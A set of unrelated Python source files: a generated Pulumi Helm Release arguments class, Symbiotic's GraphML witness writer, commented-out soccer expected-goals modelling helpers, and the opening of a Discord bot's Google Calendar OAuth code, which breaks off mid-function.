Note - Helm Release is currently in BETA and may change. Use in production environment is discouraged.
:param pulumi.Input[bool] atomic: If set, installation process purges chart on fail. `skipAwait` will be disabled automatically if atomic is used.
:param pulumi.Input[str] chart: Chart name to be installed. A path may be used.
:param pulumi.Input[bool] cleanup_on_fail: Allow deletion of new resources created in this upgrade when upgrade fails.
:param pulumi.Input[bool] create_namespace: Create the namespace if it does not exist.
:param pulumi.Input[bool] dependency_update: Run helm dependency update before installing the chart.
:param pulumi.Input[str] description: Add a custom description
:param pulumi.Input[bool] devel: Use chart development versions, too. Equivalent to version '>0.0.0-0'. If `version` is set, this is ignored.
:param pulumi.Input[bool] disable_crd_hooks: Prevent CRD hooks from, running, but run other hooks. See helm install --no-crd-hook
:param pulumi.Input[bool] disable_openapi_validation: If set, the installation process will not validate rendered templates against the Kubernetes OpenAPI Schema
:param pulumi.Input[bool] disable_webhooks: Prevent hooks from running.
:param pulumi.Input[bool] force_update: Force resource update through delete/recreate if needed.
:param pulumi.Input[str] keyring: Location of public keys used for verification. Used only if `verify` is true
:param pulumi.Input[bool] lint: Run helm lint when planning.
:param pulumi.Input[Mapping[str, Any]] manifest: The rendered manifests as JSON. Not yet supported.
:param pulumi.Input[int] max_history: Limit the maximum number of revisions saved per release. Use 0 for no limit.
:param pulumi.Input[str] name: Release name.
:param pulumi.Input[str] namespace: Namespace to install the release into.
:param pulumi.Input[str] postrender: Postrender command to run.
:param pulumi.Input[bool] recreate_pods: Perform pods restart during upgrade/rollback.
:param pulumi.Input[bool] render_subchart_notes: If set, render subchart notes along with the parent.
:param pulumi.Input[bool] replace: Re-use the given name, even if that name is already used. This is unsafe in production
:param pulumi.Input['RepositoryOptsArgs'] repository_opts: Specification defining the Helm chart repository to use.
:param pulumi.Input[bool] reset_values: When upgrading, reset the values to the ones built into the chart.
:param pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input[str]]]]] resource_names: Names of resources created by the release grouped by "kind/version".
:param pulumi.Input[bool] reuse_values: When upgrading, reuse the last release's values and merge in any overrides. If 'resetValues' is specified, this is ignored
:param pulumi.Input[bool] skip_await: By default, the provider waits until all resources are in a ready state before marking the release as successful. Setting this to true will skip such await logic.
:param pulumi.Input[bool] skip_crds: If set, no CRDs will be installed. By default, CRDs are installed if not already present.
:param pulumi.Input[int] timeout: Time in seconds to wait for any individual kubernetes operation.
:param pulumi.Input[Sequence[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]] value_yaml_files: List of assets (raw yaml files). Content is read and merged with values. Not yet supported.
:param pulumi.Input[Mapping[str, Any]] values: Custom values set for the release.
:param pulumi.Input[bool] verify: Verify the package before installing it.
:param pulumi.Input[str] version: Specify the exact chart version to install. If this is not specified, the latest version is installed.
:param pulumi.Input[bool] wait_for_jobs: Will wait until all Jobs have been completed before marking the release as successful. This is ignored if `skipAwait` is enabled.
"""
if atomic is not None:
pulumi.set(__self__, "atomic", atomic)
if chart is not None:
pulumi.set(__self__, "chart", chart)
if cleanup_on_fail is not None:
pulumi.set(__self__, "cleanup_on_fail", cleanup_on_fail)
if create_namespace is not None:
pulumi.set(__self__, "create_namespace", create_namespace)
if dependency_update is not None:
pulumi.set(__self__, "dependency_update", dependency_update)
if description is not None:
pulumi.set(__self__, "description", description)
if devel is not None:
pulumi.set(__self__, "devel", devel)
if disable_crd_hooks is not None:
pulumi.set(__self__, "disable_crd_hooks", disable_crd_hooks)
if disable_openapi_validation is not None:
pulumi.set(__self__, "disable_openapi_validation", disable_openapi_validation)
if disable_webhooks is not None:
pulumi.set(__self__, "disable_webhooks", disable_webhooks)
if force_update is not None:
pulumi.set(__self__, "force_update", force_update)
if keyring is not None:
pulumi.set(__self__, "keyring", keyring)
if lint is not None:
pulumi.set(__self__, "lint", lint)
if manifest is not None:
pulumi.set(__self__, "manifest", manifest)
if max_history is not None:
pulumi.set(__self__, "max_history", max_history)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if postrender is not None:
pulumi.set(__self__, "postrender", postrender)
if recreate_pods is not None:
pulumi.set(__self__, "recreate_pods", recreate_pods)
if render_subchart_notes is not None:
pulumi.set(__self__, "render_subchart_notes", render_subchart_notes)
if replace is not None:
pulumi.set(__self__, "replace", replace)
if repository_opts is not None:
pulumi.set(__self__, "repository_opts", repository_opts)
if reset_values is not None:
pulumi.set(__self__, "reset_values", reset_values)
if resource_names is not None:
pulumi.set(__self__, "resource_names", resource_names)
if reuse_values is not None:
pulumi.set(__self__, "reuse_values", reuse_values)
if skip_await is not None:
pulumi.set(__self__, "skip_await", skip_await)
if skip_crds is not None:
pulumi.set(__self__, "skip_crds", skip_crds)
if timeout is not None:
pulumi.set(__self__, "timeout", timeout)
if value_yaml_files is not None:
pulumi.set(__self__, "value_yaml_files", value_yaml_files)
if values is not None:
pulumi.set(__self__, "values", values)
if verify is not None:
pulumi.set(__self__, "verify", verify)
if version is not None:
pulumi.set(__self__, "version", version)
if wait_for_jobs is not None:
pulumi.set(__self__, "wait_for_jobs", wait_for_jobs)
@property
@pulumi.getter
def atomic(self) -> Optional[pulumi.Input[bool]]:
"""
If set, installation process purges chart on fail. `skipAwait` will be disabled automatically if atomic is used.
"""
return pulumi.get(self, "atomic")
@atomic.setter
def atomic(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "atomic", value)
@property
@pulumi.getter
def chart(self) -> Optional[pulumi.Input[str]]:
"""
Chart name to be installed. A path may be used.
"""
return pulumi.get(self, "chart")
@chart.setter
def chart(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "chart", value)
@property
@pulumi.getter(name="cleanupOnFail")
def cleanup_on_fail(self) -> Optional[pulumi.Input[bool]]:
"""
Allow deletion of new resources created in this upgrade when upgrade fails.
"""
return pulumi.get(self, "cleanup_on_fail")
@cleanup_on_fail.setter
def cleanup_on_fail(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "cleanup_on_fail", value)
@property
@pulumi.getter(name="createNamespace")
def create_namespace(self) -> Optional[pulumi.Input[bool]]:
"""
Create the namespace if it does not exist.
"""
return pulumi.get(self, "create_namespace")
@create_namespace.setter
def create_namespace(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "create_namespace", value)
@property
@pulumi.getter(name="dependencyUpdate")
def dependency_update(self) -> Optional[pulumi.Input[bool]]:
"""
Run helm dependency update before installing the chart.
"""
return pulumi.get(self, "dependency_update")
@dependency_update.setter
def dependency_update(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "dependency_update", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Add a custom description
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def devel(self) -> Optional[pulumi.Input[bool]]:
"""
Use chart development versions, too. Equivalent to version '>0.0.0-0'. If `version` is set, this is ignored.
"""
return pulumi.get(self, "devel")
@devel.setter
def devel(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "devel", value)
@property
@pulumi.getter(name="disableCRDHooks")
def disable_crd_hooks(self) -> Optional[pulumi.Input[bool]]:
"""
Prevent CRD hooks from, running, but run other hooks. See helm install --no-crd-hook
"""
return pulumi.get(self, "disable_crd_hooks")
@disable_crd_hooks.setter
def disable_crd_hooks(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_crd_hooks", value)
@property
@pulumi.getter(name="disableOpenapiValidation")
def disable_openapi_validation(self) -> Optional[pulumi.Input[bool]]:
"""
If set, the installation process will not validate rendered templates against the Kubernetes OpenAPI Schema
"""
return pulumi.get(self, "disable_openapi_validation")
@disable_openapi_validation.setter
def disable_openapi_validation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_openapi_validation", value)
@property
@pulumi.getter(name="disableWebhooks")
def disable_webhooks(self) -> Optional[pulumi.Input[bool]]:
"""
Prevent hooks from running.
"""
return pulumi.get(self, "disable_webhooks")
@disable_webhooks.setter
def disable_webhooks(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_webhooks", value)
@property
@pulumi.getter(name="forceUpdate")
def force_update(self) -> Optional[pulumi.Input[bool]]:
"""
Force resource update through delete/recreate if needed.
"""
return pulumi.get(self, "force_update")
@force_update.setter
def force_update(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_update", value)
@property
@pulumi.getter
def keyring(self) -> Optional[pulumi.Input[str]]:
"""
Location of public keys used for verification. Used only if `verify` is true
"""
return pulumi.get(self, "keyring")
@keyring.setter
def keyring(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "keyring", value)
@property
@pulumi.getter
def lint(self) -> Optional[pulumi.Input[bool]]:
"""
Run helm lint when planning.
"""
return pulumi.get(self, "lint")
@lint.setter
def lint(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "lint", value)
@property
@pulumi.getter
def manifest(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
The rendered manifests as JSON. Not yet supported.
"""
return pulumi.get(self, "manifest")
@manifest.setter
def manifest(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "manifest", value)
@property
@pulumi.getter(name="maxHistory")
def max_history(self) -> Optional[pulumi.Input[int]]:
"""
Limit the maximum number of revisions saved per release. Use 0 for no limit.
"""
return pulumi.get(self, "max_history")
@max_history.setter
def max_history(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_history", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Release name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
Namespace to install the release into.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def postrender(self) -> Optional[pulumi.Input[str]]:
"""
Postrender command to run.
"""
return pulumi.get(self, "postrender")
@postrender.setter
def postrender(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "postrender", value)
@property
@pulumi.getter(name="recreatePods")
def recreate_pods(self) -> Optional[pulumi.Input[bool]]:
"""
Perform pods restart during upgrade/rollback.
"""
return pulumi.get(self, "recreate_pods")
@recreate_pods.setter
def recreate_pods(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "recreate_pods", value)
@property
@pulumi.getter(name="renderSubchartNotes")
def render_subchart_notes(self) -> Optional[pulumi.Input[bool]]:
"""
If set, render subchart notes along with the parent.
"""
return pulumi.get(self, "render_subchart_notes")
@render_subchart_notes.setter
def render_subchart_notes(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "render_subchart_notes", value)
@property
@pulumi.getter
def replace(self) -> Optional[pulumi.Input[bool]]:
"""
Re-use the given name, even if that name is already used. This is unsafe in production
"""
return pulumi.get(self, "replace")
@replace.setter
def replace(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "replace", value)
@property
@pulumi.getter(name="repositoryOpts")
def repository_opts(self) -> Optional[pulumi.Input['RepositoryOptsArgs']]:
"""
Specification defining the Helm chart repository to use.
"""
return pulumi.get(self, "repository_opts")
@repository_opts.setter
def repository_opts(self, value: Optional[pulumi.Input['RepositoryOptsArgs']]):
pulumi.set(self, "repository_opts", value)
@property
@pulumi.getter(name="resetValues")
def reset_values(self) -> Optional[pulumi.Input[bool]]:
"""
When upgrading, reset the values to the ones built into the chart.
"""
return pulumi.get(self, "reset_values")
@reset_values.setter
def reset_values(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reset_values", value)
@property
@pulumi.getter(name="resourceNames")
def resource_names(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input[str]]]]]]:
"""
Names of resources created by the release grouped by "kind/version".
"""
return pulumi.get(self, "resource_names")
@resource_names.setter
def resource_names(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input[str]]]]]]):
pulumi.set(self, "resource_names", value)
@property
@pulumi.getter(name="reuseValues")
def reuse_values(self) -> Optional[pulumi.Input[bool]]:
"""
When upgrading, reuse the last release's values and merge in any overrides. If 'resetValues' is specified, this is ignored
"""
return pulumi.get(self, "reuse_values")
@reuse_values.setter
def reuse_values(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reuse_values", value)
@property
@pulumi.getter(name="skipAwait")
def skip_await(self) -> Optional[pulumi.Input[bool]]:
"""
By default, the provider waits until all resources are in a ready state before marking the release as successful. Setting this to true will skip such await logic.
"""
return pulumi.get(self, "skip_await")
@skip_await.setter
def skip_await(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "skip_await", value)
@property
@pulumi.getter(name="skipCrds")
def skip_crds(self) -> Optional[pulumi.Input[bool]]:
"""
If set, no CRDs will be installed. By default, CRDs are installed if not already present.
"""
return pulumi.get(self, "skip_crds")
@skip_crds.setter
def skip_crds(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "skip_crds", value)
@property
@pulumi.getter
def timeout(self) -> Optional[pulumi.Input[int]]:
"""
Time in seconds to wait for any individual kubernetes operation.
"""
return pulumi.get(self, "timeout")
@timeout.setter
def timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "timeout", value)
@property
@pulumi.getter(name="valueYamlFiles")
def value_yaml_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]]]:
"""
List of assets (raw yaml files). Content is read and merged with values. Not yet supported.
"""
return pulumi.get(self, "value_yaml_files")
@value_yaml_files.setter
def value_yaml_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]]]):
pulumi.set(self, "value_yaml_files", value)
@property
@pulumi.getter
def values(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Custom values set for the release.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def verify(self) -> Optional[pulumi.Input[bool]]:
"""
Verify the package before installing it.
"""
return pulumi.get(self, "verify")
@verify.setter
def verify(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "verify", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Specify the exact chart version to install. If this is not specified, the latest version is installed.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@property
@pulumi.getter(name="waitForJobs")
def wait_for_jobs(self) -> Optional[pulumi.Input[bool]]:
"""
Will wait until all Jobs have been completed before marking the release as successful. This is ignored if `skipAwait` is enabled.
"""
return pulumi.get(self, "wait_for_jobs")
@wait_for_jobs.setter
def wait_for_jobs(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "wait_for_jobs", value)
@pulumi.input_type
class RepositoryOptsArgs:
def __init__(__self__, *,
ca_file: Optional[pulumi.Input[str]] = None,
cert_file: Optional[pulumi.Input[str]] = None,
key_file: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
repo: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
Specification defining the Helm chart repository to use.
:param pulumi.Input[str] ca_file: The Repository's CA File
:param pulumi.Input[str] cert_file: The repository's cert file
:param pulumi.Input[str] key_file: The repository's cert key file
:param pulumi.Input[str] password: Password for HTTP basic authentication
:param pulumi.Input[str] repo: Repository where to locate the requested chart. If is a URL the chart is installed without installing the repository.
:param pulumi.Input[str] username: Username for HTTP basic authentication
"""
if ca_file is not None:
pulumi.set(__self__, "ca_file", ca_file)
if cert_file is not None:
pulumi.set(__self__, "cert_file", cert_file)
if key_file is not None:
pulumi.set(__self__, "key_file", key_file)
if password is not None:
pulumi.set(__self__, "password", password)
if repo is not None:
pulumi.set(__self__, "repo", repo)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="caFile")
def ca_file(self) -> Optional[pulumi.Input[str]]:
"""
The Repository's CA File
"""
return pulumi.get(self, "ca_file")
@ca_file.setter
def ca_file(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ca_file", value)
@property
@pulumi.getter(name="certFile")
def cert_file(self) -> Optional[pulumi.Input[str]]:
"""
The repository's cert file
"""
return pulumi.get(self, "cert_file")
@cert_file.setter
def cert_file(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cert_file", value)
@property
@pulumi.getter(name="keyFile")
def key_file(self) -> Optional[pulumi.Input[str]]:
"""
The repository's cert key file
"""
return pulumi.get(self, "key_file")
@key_file.setter
def key_file(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_file", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password for HTTP basic authentication
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def repo(self) -> Optional[pulumi.Input[str]]:
"""
Repository where to locate the requested chart. If is a URL the chart is installed without installing the repository.
"""
return pulumi.get(self, "repo")
@repo.setter
def repo(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "repo", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
"""
Username for HTTP basic authentication
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
|
<filename>lib/symbioticpy/symbiotic/witnesses/witnesses.py
#!/usr/bin/python
from os.path import basename
from hashlib import sha256 as hashfunc
import datetime
import re
# no_lxml = False
# try:
# from lxml import etree as ET
# except ImportError:
# no_lxml = True
no_lxml = True
if no_lxml:
# if this fails, then we're screwed, so let the script die
from xml.etree import ElementTree as ET
def get_hash(source):
f = open(source, 'r', encoding='utf-8')
hsh = hashfunc()
for l in f:
hsh.update(l.encode('utf-8'))
f.close()
return hsh.hexdigest()
class GraphMLWriter(object):
def __init__(self, source, prps, is32bit, is_correctness_wit):
self._source = source
self._prps = prps
self._is32bit = is32bit
self._correctness_wit = is_correctness_wit
self._root = None
self._graph = None
# this prevents adding ns0 prefix to all tags
ET.register_namespace("", "http://graphml.graphdrawing.org/xmlns")
def _addCInfo(self):
assert self._root is not None
if self._is32bit:
arch = '32bit'
else:
arch = '64bit'
# add the description
if self._correctness_wit:
ET.SubElement(self._graph, 'data',
key='witness-type').text = 'correctness_witness'
else:
ET.SubElement(self._graph, 'data',
key='witness-type').text = 'violation_witness'
ET.SubElement(self._graph, 'data', key='sourcecodelang').text = 'C'
ET.SubElement(self._graph, 'data', key='producer').text = 'Symbiotic'
for p in self._prps:
ET.SubElement(self._graph, 'data', key='specification').text = p
ET.SubElement(self._graph, 'data', key='programfile').text = self._source
ET.SubElement(self._graph, 'data',
key='programhash').text = get_hash(self._source)
ET.SubElement(self._graph, 'data', key='architecture').text = arch
ET.SubElement(self._graph, 'data', key='creationtime').text =\
'{date:%Y-%m-%d %T}'.format(date=datetime.datetime.utcnow())
def createTrivialWitness(self):
if no_lxml:
self._root = ET.Element('graphml')
else:
#ns = {"": 'http://graphml.graphdrawing.org/xmlns'}
self._root = ET.Element('graphml')
self._graphml = ET.ElementTree(self._root)
self._graph = ET.SubElement(self._root, 'graph', edgedefault="directed")
entry = ET.SubElement(self._graph, 'node', id='0')
ET.SubElement(entry, 'data', key='entry').text = 'true'
self._addCInfo()
def parseError(self, ktest, is_termination):
"""
Parse .path file from klee
\param ktest the .ktest file
\param filename name of the file the symbiotic ran on
-- in the case that we want to stick
only to this file in the witness
"""
assert not self._correctness_wit
# parse the graphml file from KLEE
self._graphml = ET.parse('{0}graphml'.format(ktest[:ktest.rfind('.')+1]))
assert self._graphml, "Failed parsing witness from KLEE"
self._root = self._graphml.getroot()
assert len(self._root.getchildren()) == 1
self._graph = list(self._root.getchildren())[0]
self._addCInfo()
def dump(self):
if no_lxml:
print(ET.tostring(self._root).decode('utf-8'))
else:
print(ET.tostring(self._root, pretty_print=True).decode('utf-8'))
def write(self, to):
et = self._graphml
if no_lxml:
et.write(to, encoding='UTF-8', method="xml",
xml_declaration=True)
else:
et.write(to, encoding='UTF-8', method="xml",
pretty_print=True, xml_declaration=True)
|
import numpy as np
import pandas as pd
from sklearn.metrics import log_loss
import matplotlib.pyplot as plt
# def manual_train_split(df, train_sample_size=80):
# """input dataframe of shots, return train_test_split by game_id
# input dataframe -> get unique game ids -> take sample of 80/159 (may be some repeasts from
# np.random.choice)
# first for loop: take those game ids and then add them to games_to_train_on
# second for loop: drop those games from the master 'possible_games' list
# return dataframe of shots (in specific games) to train model on
# --------------------------------------------------------------------
# holdout_test, train = manual_train_split(shots_df)
# returns: game_ids to hold out/predict on, list to train on
# """
# possible_games = list(df['game_id'].unique())
# game_numbers = len(possible_games)
# games_to_sample = np.random.choice(game_numbers, train_sample_size)
# games_to_train_on = []
# for i in games_to_sample:
# games_to_train_on.append(possible_games[i])
# for game in games_to_train_on:
# if game in possible_games:
# possible_games.remove(game)
# return possible_games, games_to_train_on
# def manual_test_split(possible_games, test_sample_size=50):
# """input: possible_games which is game_ids minus the game_ids used for training,
# test_sample_size is 50 games to predict on, usually less due to random sample
# output: list of games_ids to predict and remaining holdout set
# first for loop: takes random sample, then corresponding game_ids in list (by position)
# second for loop: removes those sample games from the possible_games list, leaving final holdout_list"""
# games_left = len(possible_games)
# games_to_sample = np.random.choice(games_left, test_sample_size)
# games_to_predict = []
# for i in games_to_sample:
# games_to_predict.append(possible_games[i])
# for game in games_to_predict:
# if game in possible_games:
# possible_games.remove(game)
# holdout_games = possible_games.copy()
# return holdout_games, games_to_predict
# def create_training_df(df, train_sample_size=90):
# """input total shot df and return training data split into train_data (x) and train_y (y)
# train_sample_size is the number of games (will sample 90 with some possible repeats)
# ex: train_data, train_y, indices, hold_test = training_df(shots_df)
# """
# rf_columns = ['player_id', 'shot_distance', 'shot_angle', 'assisted_shot', 'is_penalty_attempt']
# hold_test, train = manual_train_split(df)
# shots_to_train_on = df[df['game_id'].isin(np.array(train))].copy()
# train_data = shots_to_train_on[rf_columns].astype(float)
# train_y = shots_to_train_on['is_goal'].astype(float)
# indices = shots_to_train_on.index.values
# return train_data, train_y, indices, hold_test
# def create_test_df(df, hold_test):
# """input df, and previous hold_test from training_df to return
# test_data and test_y to be run through rf"""
# rf_columns = ['player_id', 'shot_distance', 'shot_angle', 'assisted_shot', 'is_penalty_attempt']
# holdout, test = manual_test_split(hold_test)
# shots_to_predict = df[df['game_id'].isin(np.array(test))].copy()
# test_data = shots_to_predict[rf_columns].astype(float)
# test_y = shots_to_predict['is_goal'].astype(float)
# indices1 = shots_to_predict.index.values
# return test_data, test_y, indices1, holdout, test
# def use_holdout_df(df, holdout):
# """insert df and holdout (game_ids not yet predicted) and return df to predict on"""
# rf_columns = ['player_id', 'shot_distance', 'shot_angle', 'assisted_shot', 'is_penalty_attempt']
# shots_to_predict = df[df['game_id'].isin(np.array(holdout))].copy()
# test_data = shots_to_predict[rf_columns].astype(float)
# test_y = shots_to_predict['is_goal'].astype(float)
# indices1 = shots_to_predict.index.values
# return test_data, test_y, indices1
# def create_xG_df(test_data, test_y, model_predictions):
# """create new dataframe with predicted probas and actual goals for predicted shots"""
# df = pd.DataFrame(test_data)
# df['is_goal'] = test_y
# df['xG'] = model_predictions[:, 1]
# df['xA'] = df['assisted_shot'] * df['xG']
# return df
# def create_hypothetical_df(test_data, model_predictions):
# """create new dataframe with predicted probas and actual goals for predicted shots"""
# df = pd.DataFrame(test_data)
# df['xG'] = model_predictions[:, 1]
# return df
# def create_summed_xG_df(df):
# """input xg_df and return dataframe of summed xg and xa for each player"""
# unique_players = df['player_id'].unique()
# contributions = []
# for player in unique_players:
# xgsum = round(df[df['player_id'] == player]['xG'].sum(), 2)
# xasum = round(df[df['player_id'] == player]['xA'].sum(), 2)
# xgxasum = round(xgsum + xasum, 2)
# goals = df[df['player_id'] == player]['is_goal'].sum()
# pen_attempts = df[df['player_id'] == player]['is_penalty_attempt'].sum()
# contributions.append([player, xgsum, xasum, xgxasum, pen_attempts, goals])
# by_xG = sorted(contributions, key=lambda x: x[1], reverse=True)
# contribution_df = pd.DataFrame(by_xG, columns=['player_id', 'total_xG', 'total_xA', 'total_xG+xA', 'pen_attempts', 'goals'])
# return contribution_df
# ### moving from shots to players and minutes
# def create_test_min_df(player_df, test):
# """input player_df and the list of games that were predited on to return
# the players and minuts played in the predicted games"""
# min_df = player_df[player_df['game_id'].isin(np.array(test))].copy()
# players = min_df['player_id'].unique()
# player_minutes = []
# for player in players:
# total_minutes = min_df[min_df['player_id'] == player]['minutes_played'].sum()
# name = min_df[min_df['player_id'] == player]['name'].iloc[0]
# player_minutes.append([player, total_minutes, name])
# player_minutes_df = pd.DataFrame(player_minutes, columns=['player_id', 'total_minutes_played', 'player_name'])
# return player_minutes_df
# def merged_dataframes(player_df, contribution_df):
# columns = ['player_name', 'player_id', 'total_xG', 'total_xA', 'total_xG+xA', 'goals', 'xG+xA/90', 'total_minutes_played']
# xg_min = pd.merge(contribution_df, player_df, on='player_id', how='outer')
# xg_min['xG+xA/90'] = xg_min['total_xG+xA'].copy() / (xg_min['total_minutes_played'] / 90)
# xg_final = xg_min[columns]
# return xg_final
# def player_minutes_total(players_minutes_df):
# """input player_minutes_df from create_test_min_df so that each row is a unique player"""
# players = players_minutes_df['player_id'].unique()
# player_minutes = []
# for player in players:
# total_minutes = players_minutes_df[players_minutes_df['player_id'] == player]['minutes_played'].sum()
# name = players_minutes_df[players_minutes_df['player_id'] == player]['name'].iloc[0]
# squad_num = players_minutes_df[players_minutes_df['player_id'] == player]['squad_number'].iloc[0]
# club_brev = players_minutes_df[players_minutes_df['player_id'] == player]['club_brev'].iloc[0]
# position_id = players_minutes_df[players_minutes_df['player_id'] == player]['position_id'].iloc[0]
# player_minutes.append([player, total_minutes, name, squad_num, club_brev, position_id])
# summed_player_min = pd.DataFrame(player_minutes, columns=['player_id', 'total_minutes_played', 'player_name', 'squad_num', 'club_brev', 'position_id'])
# return summed_player_min
# def create_rf_prep(df):
# """input df, return the appropriate columns to be run through rf"""
# rf_columns = ['shot_distance', 'shot_angle', 'assisted_shot']
# return df[rf_columns].astype(float)
# #use to tune classifiers
# def stage_score_plot(estimator, X_train, y_train, X_test, y_test):
# '''
# Parameters: estimator: GradientBoostingClassifier or xgBoostClassifier
# X_train: pandas dataframe
# y_train: 1d panda dataframe
# X_test: pandas dataframe
# y_test: 1d panda dataframe
# Returns: A plot of the number of iterations vs the log loss for the model for
# both the training set and test set.
# '''
# # fit estimator
# estimator.fit(X_train, y_train)
# train_logloss_at_stages = []
# test_logloss_at_stages = []
# # iterate through all stages for test and train and record log loss lists
# for y1, y2 in zip(estimator.staged_predict_proba(X_train), estimator.staged_predict_proba(X_test)):
# train_logloss = log_loss(y_train, y1)
# train_logloss_at_stages.append(train_logloss)
# test_logloss = log_loss(y_test, y2)
# test_logloss_at_stages.append(test_logloss)
# # find the # of trees at which test error is the lowest
# lowest_test_error = np.min(test_logloss_at_stages)
# num_trees_lowest_test_error = np.argmin(test_logloss_at_stages)
# # create xs in order to plot. each x represents n_estimators.
# xs = range(0, len(test_logloss_at_stages))
# fig, ax = plt.subplots(figsize=(8, 6))
# ax.plot(xs, train_logloss_at_stages,
# label="{} Train".format(estimator.__class__.__name__))
# ax.plot(xs, test_logloss_at_stages,
# label="{} Test".format(estimator.__class__.__name__))
# ax.axvline(num_trees_lowest_test_error)
# ax.legend()
# return lowest_test_error, num_trees_lowest_test_error
# # print(f'lowest test error(log loss): {lowest_test_error}')
# # print(f'num_trees at lowest test error: {num_trees_lowest_test_error}')
# # example of how to use:
# # fig, ax = plt.subplots(figsize=(12, 8))
# # stage_score_plot(gdbr_model, X_train, y_train, X_test, y_test)
# # stage_score_plot(gdbr_model_2, X_train, y_train, X_test, y_test)
# # ax.legend()
# # plt.show()
# def add_xg_shotdf(shot_df, model_pred):
# """add predicted xG to shot_df"""
# shot_df['xG'] = model_pred[:, 1] |
import datetime
from dateutil.parser import parse as dtparse
import discord
import requests
import pickle
import bs4
import time
import re
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import google.oauth2.credentials
from oauth2client import tools
from oauth2client.file import Storage
from oauth2client.client import GoogleCredentials, OAuth2WebServerFlow
# If modifying these scopes, delete the file token.pickle.
GOOGLE_CLIENT_ID = os.environ.get('GOOGLE_CLIENT_ID')
GOOGLE_CLIENT_SECRET = os.environ.get('GOOGLE_CLIENT_SECRET')
GOOGLE_REFRESH_TOKEN = os.environ.get('GOOGLE_REFRESH_TOKEN')
TIME_ZONE_STR = '-05:00' if time.localtime().tm_isdst == 0 else '-04:00'
UMARL_CALENDAR_ID = '<EMAIL>'
WEEKDAYS = ("Monday","Tuesday","Wednesday","Thursday","Friday","Saturday","Sunday")
MONTHS = ("January", "February")
def refreshToken(client_id, client_secret, refresh_token):
params = {
"grant_type": "refresh_token",
"client_id": client_id,
"client_secret": client_secret,
"refresh_token": refresh_token
}
authorization_url = "https://www.googleapis.com/oauth2/v4/token"
r = requests.post(authorization_url, data=params)
if r.ok:
return r.json()['access_token']
else:
return None
async def get_credentials(ctx, client):
credentials = None
# with open('refresh.token', 'r') as f:
# refresh_token = f.readline()
access_token = refreshToken(GOOGLE_CLIENT_ID, GOOGLE_CLIENT_SECRET, GOOGLE_REFRESH_TOKEN)
credentials = google.oauth2.credentials.Credentials(access_token)
if not credentials or not credentials.valid:
